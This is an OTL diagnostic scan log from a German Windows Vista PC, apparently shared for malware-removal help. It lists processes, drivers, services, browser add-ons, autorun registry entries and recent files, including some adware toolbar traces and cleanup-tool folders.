PRC - [2012.05.08 15:53:01 | 000,086,224 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Programme\Avira\AntiVir Desktop\sched.exe

PRC - [2012.05.08 15:52:55 | 000,080,336 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Programme\Avira\AntiVir Desktop\avshadow.exe

PRC - [2012.05.08 15:52:54 | 000,110,032 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Programme\Avira\AntiVir Desktop\avguard.exe

PRC - [2009.04.11 07:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe

PRC - [2008.08.26 18:02:24 | 000,014,336 | ---- | M] (Agere Systems) -- C:\Programme\LSI SoftModem\agrsmsvc.exe

PRC - [2008.05.28 13:27:52 | 000,090,112 | ---- | M] (Andrea Electronics Corporation) -- C:\Windows\System32\AEADISRV.EXE

PRC - [2008.01.19 08:33:39 | 000,896,512 | ---- | M] (Microsoft Corporation) -- C:\Programme\Windows Media Player\wmpnetwk.exe

PRC - [2008.01.19 08:33:39 | 000,202,240 | ---- | M] (Microsoft Corporation) -- C:\Programme\Windows Media Player\wmpnscfg.exe

PRC - [2007.09.02 12:58:52 | 000,495,616 | ---- | M] () -- C:\Programme\RocketDock\RocketDock.exe

 

 
 ========== Modules (No Company Name) ==========

 

MOD - [2013.02.16 21:25:22 | 012,433,920 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\e64304962098e90f0d3f4c33c1b080a6\System.Windows.Forms.ni.dll

MOD - [2013.02.08 16:40:03 | 003,023,256 | ---- | M] () -- C:\Programme\Mozilla Firefox\mozjs.dll

MOD - [2013.01.11 11:57:15 | 000,998,400 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\f042f66c2ad8fd5b8c34fa22cd22079e\System.Management.ni.dll

MOD - [2013.01.10 20:29:26 | 001,593,856 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\78157a494dc9a7e52be8840decfcd9cc\System.Drawing.ni.dll

MOD - [2013.01.10 20:27:01 | 007,977,984 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System\cc149d08e75f8c53cd28ac926b38c370\System.ni.dll

MOD - [2013.01.10 20:26:52 | 011,492,352 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\2227d1559f87943255069398608d5c56\mscorlib.ni.dll

MOD - [2013.01.09 15:22:09 | 002,242,096 | ---- | M] () -- C:\Programme\Mozilla Thunderbird\mozjs.dll

MOD - [2013.01.09 15:22:09 | 000,158,256 | ---- | M] () -- C:\Programme\Mozilla Thunderbird\nsldap32v60.dll

MOD - [2013.01.09 15:22:09 | 000,022,576 | ---- | M] () -- C:\Programme\Mozilla Thunderbird\nsldappr32v60.dll

MOD - [2012.11.29 22:59:32 | 000,093,696 | ---- | M] () -- C:\Programme\FileZilla\fzshellext.dll

MOD - [2012.11.21 06:26:34 | 000,008,704 | ---- | M] () -- C:\Users\TuS\AppData\Roaming\Thunderbird\Profiles\oun4j9un.default\extensions\mintrayr@tn123.ath.cx\lib\tray_x86-msvc.dll

MOD - [2012.05.30 19:06:48 | 000,087,912 | ---- | M] () -- C:\Programme\Common Files\Apple\Apple Application Support\zlib1.dll

MOD - [2012.05.30 19:06:30 | 001,242,512 | ---- | M] () -- C:\Programme\Common Files\Apple\Apple Application Support\libxml2.dll

MOD - [2007.09.02 12:58:52 | 000,495,616 | ---- | M] () -- C:\Programme\RocketDock\RocketDock.exe

MOD - [2007.09.02 12:57:36 | 000,069,632 | ---- | M] () -- C:\Programme\RocketDock\RocketDock.dll

 

 
 ========== Services (SafeList) ==========

 

SRV - [2013.02.19 20:30:04 | 000,251,248 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)

SRV - [2013.02.08 16:40:03 | 000,115,608 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Programme\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)

SRV - [2012.07.27 21:51:26 | 000,063,960 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Programme\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)

SRV - [2012.05.08 15:53:01 | 000,086,224 | ---- | M] (Avira Operations GmbH & Co. KG) [Auto | Running] -- C:\Programme\Avira\AntiVir Desktop\sched.exe -- (AntiVirSchedulerService)

SRV - [2012.05.08 15:52:54 | 000,110,032 | ---- | M] (Avira Operations GmbH & Co. KG) [Auto | Running] -- C:\Programme\Avira\AntiVir Desktop\avguard.exe -- (AntiVirService)

SRV - [2008.08.26 18:02:24 | 000,014,336 | ---- | M] (Agere Systems) [Auto | Running] -- C:\Programme\LSI SoftModem\agrsmsvc.exe -- (AgereModemAudio)

SRV - [2008.05.28 13:27:52 | 000,090,112 | ---- | M] (Andrea Electronics Corporation) [Auto | Running] -- C:\Windows\System32\AEADISRV.EXE -- (AEADIFilters)

SRV - [2008.01.19 08:38:24 | 000,272,952 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Programme\Windows Defender\MpSvc.dll -- (WinDefend)

SRV - [2008.01.19 08:33:39 | 000,896,512 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Programme\Windows Media Player\wmpnetwk.exe -- (WMPNetworkSvc)

 

 
 ========== Driver Services (SafeList) ==========

 

DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkfwd.sys -- (NwlnkFwd)

DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkflt.sys -- (NwlnkFlt)

DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\ipinip.sys -- (IpInIp)

DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\ewusbmdm.sys -- (hwdatacard)

DRV - File not found [Kernel | On_Demand | Stopped] -- C:\Users\TuS\AppData\Local\Temp\catchme.sys -- (catchme)

DRV - File not found [Kernel | Disabled | Stopped] -- C:\Windows\system32\drivers\blbdrive.sys -- (blbdrive)

DRV - [2012.10.10 17:30:40 | 000,033,512 | ---- | M] (AnchorFree Inc) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\taphss.sys -- (taphss)

DRV - [2012.05.08 15:53:03 | 000,137,928 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\avipbb.sys -- (avipbb)

DRV - [2012.05.08 15:53:03 | 000,083,392 | ---- | M] (Avira GmbH) [File_System | Auto | Running] -- C:\Windows\System32\drivers\avgntflt.sys -- (avgntflt)

DRV - [2011.09.16 15:08:07 | 000,036,000 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\avkmgr.sys -- (avkmgr)

DRV - [2009.10.08 15:55:33 | 000,028,520 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\ssmdrv.sys -- (ssmdrv)

DRV - [2009.08.24 08:14:30 | 000,044,544 | ---- | M] (AzureWave Technologies, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\azvusb.sys -- (azvusb)

DRV - [2009.03.27 06:48:22 | 001,810,992 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\snp2uvc.sys -- (SNP2UVC)

DRV - [2008.11.21 20:53:40 | 001,204,128 | ---- | M] (Agere Systems) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\AGRSM.sys -- (AgereSoftModem)

DRV - [2008.11.17 15:40:22 | 003,668,480 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\NETw5v32.sys -- (NETw5v32)

DRV - [2008.08.07 14:42:12 | 000,025,392 | ---- | M] (Hewlett-Packard Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\hpdskflt.sys -- (hpdskflt)

DRV - [2008.08.07 14:31:52 | 000,034,608 | ---- | M] (Hewlett-Packard Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\Accelerometer.sys -- (Accelerometer)

DRV - [2008.04.14 22:39:06 | 000,009,344 | ---- | M] (Hewlett-Packard Development Company, L.P.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\CPQBttn.sys -- (HBtnKey)

DRV - [2007.06.14 13:41:00 | 000,466,048 | ---- | M] (LITEON) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\Ltn_stk7070P.sys -- (Ltn_stk7070P)

DRV - [2007.06.13 18:30:20 | 000,013,440 | ---- | M] (LITEON) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\Ltn_stkrc.sys -- (Ltn_stkrc)

 

 
 ========== Standard Registry (SafeList) ==========

 

 
 ========== Internet Explorer ==========

 

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank

IE - HKLM\..\SearchScopes,DefaultScope = 

IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC

 

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,StartPageCache = 1

IE - HKCU\..\SearchScopes,DefaultScope = 

IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC

IE - HKCU\..\SearchScopes\{453CCCC2-B564-4517-899E-4FF9C03C456E}: "URL" = hxxp://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT1561552

IE - HKCU\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC

IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local

 
 ========== FireFox ==========

 

FF - prefs.js..browser.search.useDBForOrder: true

FF - prefs.js..browser.startup.homepage: "hxxp://www.google.de/"

FF - prefs.js..extensions.enabledAddons: %7BDDC359D1-844A-42a7-9AA1-88A850A938A8%7D:2.0.15

FF - prefs.js..extensions.enabledAddons: FirefoxToolbar%40gutscheindoktor.de:1.8

FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:18.0.2

FF - prefs.js..extensions.enabledItems: {ab91efd4-6975-4081-8552-1b3922ed79e2}:1.0.5.1

FF - prefs.js..extensions.enabledItems: {82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}:5.3.0.7550

FF - prefs.js..extensions.enabledItems: firejump@firejump.net:1.0.2.5

FF - prefs.js..extensions.enabledItems: {DDC359D1-844A-42a7-9AA1-88A850A938A8}:2.0.13

FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA}:6.0.31

FF - user.js - File not found

 

FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32_11_6_602_168.dll ()

FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found

FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()

FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.15.2: C:\Windows\system32\npDeployJava1.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.15.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

 

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\linkfilter@kaspersky.ru: C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2011\FFExt\linkfilter@kaspersky.ru

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 18.0.2\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013.02.08 16:40:09 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 18.0.2\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2013.02.19 20:32:55 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 17.0.2\extensions\\Components: C:\Program Files\Mozilla Thunderbird\components [2013.01.24 21:00:01 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 17.0.2\extensions\\Plugins: C:\Program Files\Mozilla Thunderbird\plugins

FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 18.0.2\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013.02.08 16:40:09 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 18.0.2\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2013.02.19 20:32:55 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Thunderbird 17.0.2\extensions\\Components: C:\Program Files\Mozilla Thunderbird\components [2013.01.24 21:00:01 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Thunderbird 17.0.2\extensions\\Plugins: C:\Program Files\Mozilla Thunderbird\plugins

 

[2011.02.18 19:21:33 | 000,000,000 | ---D | M] (No name found) -- C:\Users\TuS\AppData\Roaming\mozilla\Extensions

[2013.02.19 10:32:45 | 000,000,000 | ---D | M] (No name found) -- C:\Users\TuS\AppData\Roaming\mozilla\Firefox\Profiles\5j2bf9y8.default\extensions

[2011.06.09 19:34:49 | 000,000,000 | ---D | M] (Microsoft .NET Framework Assistant) -- C:\Users\TuS\AppData\Roaming\mozilla\Firefox\Profiles\5j2bf9y8.default\extensions\{20a82645-c095-46ed-80e3-08825760534b}

[2011.02.18 19:26:18 | 000,000,000 | ---D | M] (HP Detect) -- C:\Users\TuS\AppData\Roaming\mozilla\Firefox\Profiles\5j2bf9y8.default\extensions\{ab91efd4-6975-4081-8552-1b3922ed79e2}

[2013.02.12 14:00:46 | 000,083,610 | ---- | M] () (No name found) -- C:\Users\TuS\AppData\Roaming\mozilla\firefox\profiles\5j2bf9y8.default\extensions\FirefoxToolbar@gutscheindoktor.de.xpi

[2012.09.13 21:26:35 | 000,698,867 | ---- | M] () (No name found) -- C:\Users\TuS\AppData\Roaming\mozilla\firefox\profiles\5j2bf9y8.default\extensions\{DDC359D1-844A-42a7-9AA1-88A850A938A8}.xpi

[2013.02.19 14:52:45 | 000,000,000 | ---D | M] (No name found) -- C:\Programme\Mozilla Firefox\extensions

[2013.02.08 16:39:04 | 000,000,000 | ---D | M] (Modul zur Link-Untersuchung) -- C:\Programme\Mozilla Firefox\extensions\linkfilter@kaspersky.ru_bak

[2013.02.08 16:40:09 | 000,262,552 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll

[2012.06.30 07:09:43 | 000,001,392 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\amazondotcom-de.xml

[2012.10.05 18:41:04 | 000,002,465 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\bing.xml

[2012.06.30 07:09:43 | 000,001,153 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\eBay-de.xml

[2012.06.30 07:09:43 | 000,006,805 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\leo_ende_de.xml

[2012.06.30 07:09:43 | 000,001,178 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\wikipedia-de.xml

[2012.06.30 07:09:43 | 000,001,105 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\yahoo-de.xml

 

O1 HOSTS File: ([2013.02.19 19:29:06 | 000,000,027 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts

O1 - Hosts: 127.0.0.1       localhost

O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre7\bin\ssv.dll (Oracle Corporation)

O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programme\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)

O4 - HKLM..\Run: [APSDaemon] C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)

O4 - HKLM..\Run: [avgnt] C:\Program Files\Avira\AntiVir Desktop\avgnt.exe (Avira Operations GmbH & Co. KG)

O4 - HKCU..\Run: [RocketDock] C:\Program Files\RocketDock\RocketDock.exe ()

O4 - HKCU..\Run: [WMPNSCFG] C:\Programme\Windows Media Player\wmpnscfg.exe (Microsoft Corporation)

O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 28

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0

O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0

O10 - NameSpace_Catalog5\Catalog_Entries\000000000008 [] - C:\Programme\Bonjour\mdnsNSP.dll (Apple Inc.)

O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_10-windows-i586.cab (Reg Error: Value error.)

O16 - DPF: {CAFEEFAC-0017-0000-0010-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_10-windows-i586.cab (Java Plug-in 1.7.0_10)

O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_10-windows-i586.cab (Java Plug-in 10.15.2)

O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.2.1

O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{AC1F1EA0-BD7D-4511-87CD-7023DBE3F1CA}: DhcpNameServer = 192.168.2.1

O18 - Protocol\Handler\ipp\0x00000001 {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Programme\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)

O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Programme\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)

O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Programme\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)

O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)

O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation)

O24 - Desktop WallPaper: C:\Users\TuS\AppData\Roaming\Microsoft\Windows Photo Gallery\Hintergrundbild der Windows-Fotogalerie.jpg

O24 - Desktop BackupWallPaper: C:\Users\TuS\AppData\Roaming\Microsoft\Windows Photo Gallery\Hintergrundbild der Windows-Fotogalerie.jpg

O32 - HKLM CDRom: AutoRun - 1

O32 - AutoRun File - [2006.09.18 22:43:36 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]

O32 - AutoRun File - [2011.02.22 17:59:49 | 000,000,000 | ---D | M] - G:\autorun -- [ NTFS ]

O34 - HKLM BootExecute: (autocheck autochk *)

O35 - HKLM\..comfile [open] -- "%1" %*

O35 - HKLM\..exefile [open] -- "%1" %*

O37 - HKLM\...com [@ = ComFile] -- "%1" %*

O37 - HKLM\...exe [@ = exefile] -- "%1" %*

O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)

O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)

 

ActiveX: {08B0E5C0-4FCB-11CF-AAA5-00401C608500} - Java (Sun)

ActiveX: {2179C5D3-EBFF-11CF-B6FD-00AA00B4E220} - 

ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 11.0

ActiveX: {25FFAAD0-F4A3-4164-95FF-4461E9F35D51} - .NET Framework

ActiveX: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll

ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack

ActiveX: {3C3901C5-3455-3E0A-A214-0B093A5070A6} - .NET Framework

ActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Windows Mail\WinMail.exe" OCInstallUserConfigOE

ActiveX: {44BBA848-CC51-11CF-AAFA-00AA00B6015C} - 

ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx

ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help

ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6

ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools

ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements

ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player

ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access

ActiveX: {73FA19D0-2D75-11D2-995D-00C04F98BBC9} - Webordner

ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7

ActiveX: {7C028AF8-F614-47B3-82DA-BA94E41B1089} - .NET Framework

ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll

ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\Windows\system32\ie4uinit.exe -BaseSettings

ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\system32\Rundll32.exe C:\Windows\system32\mscories.dll,Install

ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding

ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts

ActiveX: {CDD7975E-60F8-41d5-8149-19E51D6F71D0} - Windows Movie Maker v2.1

ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help

ActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface

ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - C:\Windows\system32\unregmp2.exe /ShowWMP

ActiveX: >{26923b43-4d38-484f-9b9e-de460746276c} - C:\Windows\system32\ie4uinit.exe -UserIconConfig

ActiveX: >{60B49E34-C7CC-11D0-8953-00A0C90347FF} - "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\iedkcs32.dll",BrandIEActiveSetup SIGNUP

 

NetSvcs: FastUserSwitchingCompatibility -  File not found

NetSvcs: Ias - C:\Windows\System32\ias.dll (Microsoft Corporation)

NetSvcs: Nla -  File not found

NetSvcs: Ntmssvc -  File not found

NetSvcs: NWCWorkstation -  File not found

NetSvcs: Nwsapagent -  File not found

NetSvcs: SRService -  File not found

NetSvcs: WmdmPmSp -  File not found

NetSvcs: LogonHours -  File not found

NetSvcs: PCAudit -  File not found

NetSvcs: helpsvc -  File not found

NetSvcs: uploadmgr -  File not found

 

 

CREATERESTOREPOINT

Restore point Set: OTL Restore Point

 
 ========== Files/Folders - Created Within 30 Days ==========

 

[2013.02.19 21:26:15 | 000,012,872 | ---- | C] (SurfRight B.V.) -- C:\Windows\System32\bootdelete.exe

[2013.02.19 21:21:34 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\TuS\Desktop\OTL.exe

[2013.02.19 21:08:42 | 000,000,000 | ---D | C] -- C:\ProgramData\HitmanPro

[2013.02.19 20:38:42 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Java

[2013.02.19 20:32:05 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Adobe

[2013.02.19 20:32:05 | 000,000,000 | ---D | C] -- C:\Program Files\Adobe

[2013.02.19 20:13:29 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner

[2013.02.19 20:13:28 | 000,000,000 | ---D | C] -- C:\Program Files\CCleaner

[2013.02.19 19:31:48 | 000,000,000 | ---D | C] -- C:\Windows\temp

[2013.02.19 19:31:48 | 000,000,000 | ---D | C] -- C:\Users\TuS\AppData\Local\temp

[2013.02.19 19:31:00 | 000,000,000 | -HSD | C] -- C:\$RECYCLE.BIN

[2013.02.19 18:28:01 | 000,000,000 | ---D | C] -- C:\Qoobox

[2013.02.19 18:17:22 | 000,518,144 | ---- | C] (SteelWerX) -- C:\Windows\SWREG.exe

[2013.02.19 18:17:22 | 000,406,528 | ---- | C] (SteelWerX) -- C:\Windows\SWSC.exe

[2013.02.19 18:17:22 | 000,060,416 | ---- | C] (NirSoft) -- C:\Windows\NIRCMD.exe

[2013.02.19 18:16:49 | 000,000,000 | ---D | C] -- C:\Windows\erdnt

[2013.02.19 10:35:50 | 000,000,000 | ---D | C] -- C:\Windows\System32\IO

[2013.02.18 22:35:01 | 000,000,000 | ---D | C] -- C:\Users\TuS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Notepad++

[2013.02.18 22:35:01 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++

[2013.02.18 22:34:57 | 000,000,000 | ---D | C] -- C:\Users\TuS\AppData\Roaming\Notepad++

[2013.02.18 22:34:57 | 000,000,000 | ---D | C] -- C:\Program Files\Notepad++

[2013.02.08 16:39:00 | 000,000,000 | ---D | C] -- C:\Program Files\Mozilla Firefox

[2013.01.29 19:19:29 | 000,000,000 | ---D | C] -- C:\Users\TuS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MP3Gain

[2013.01.29 19:19:29 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MP3Gain

[2013.01.29 19:19:25 | 000,000,000 | ---D | C] -- C:\Program Files\MP3Gain

[2013.01.24 20:59:28 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime

[2013.01.24 20:59:07 | 000,000,000 | ---D | C] -- C:\Program Files\QuickTime

[2013.01.24 18:46:22 | 000,000,000 | ---D | C] -- C:\Users\TuS\AppData\Roaming\Malwarebytes

[2013.01.24 18:45:58 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes

 
 ========== Files - Modified Within 30 Days ==========

 

[2013.02.19 21:30:29 | 000,005,312 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0

[2013.02.19 21:30:28 | 000,005,312 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0

[2013.02.19 21:30:21 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat

[2013.02.19 21:30:15 | 2073,313,280 | -HS- | M] () -- C:\hiberfil.sys

[2013.02.19 21:27:17 | 000,000,012 | ---- | M] () -- C:\Windows\bthservsdp.dat

[2013.02.19 21:26:15 | 000,012,872 | ---- | M] (SurfRight B.V.) -- C:\Windows\System32\bootdelete.exe

[2013.02.19 21:21:36 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\TuS\Desktop\OTL.exe

[2013.02.19 21:19:00 | 000,000,884 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job

[2013.02.19 20:50:34 | 000,304,952 | ---- | M] () -- C:\Windows\System32\FNTCACHE.DAT

[2013.02.19 20:13:29 | 000,000,804 | ---- | M] () -- C:\Users\Public\Desktop\CCleaner.lnk

[2013.02.19 19:29:06 | 000,000,027 | ---- | M] () -- C:\Windows\System32\drivers\etc\hosts

[2013.02.19 14:19:39 | 000,628,742 | ---- | M] () -- C:\Windows\System32\perfh007.dat

[2013.02.19 14:19:39 | 000,595,996 | ---- | M] () -- C:\Windows\System32\perfh009.dat

[2013.02.19 14:19:39 | 000,126,260 | ---- | M] () -- C:\Windows\System32\perfc007.dat

[2013.02.19 14:19:39 | 000,104,070 | ---- | M] () -- C:\Windows\System32\perfc009.dat

[2013.02.18 21:29:48 | 000,021,751 | ---- | M] () -- C:\Users\TuS\.recently-used.xbel

[2013.01.27 13:11:19 | 000,068,096 | ---- | M] () -- C:\Users\TuS\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini

[2013.01.23 22:05:03 | 000,000,496 | ---- | M] () -- C:\Users\TuS\AppData\Roaming\burnaware.ini

 
 ========== Files Created - No Company Name ==========

 

[2013.02.19 20:32:55 | 000,001,804 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader X.lnk

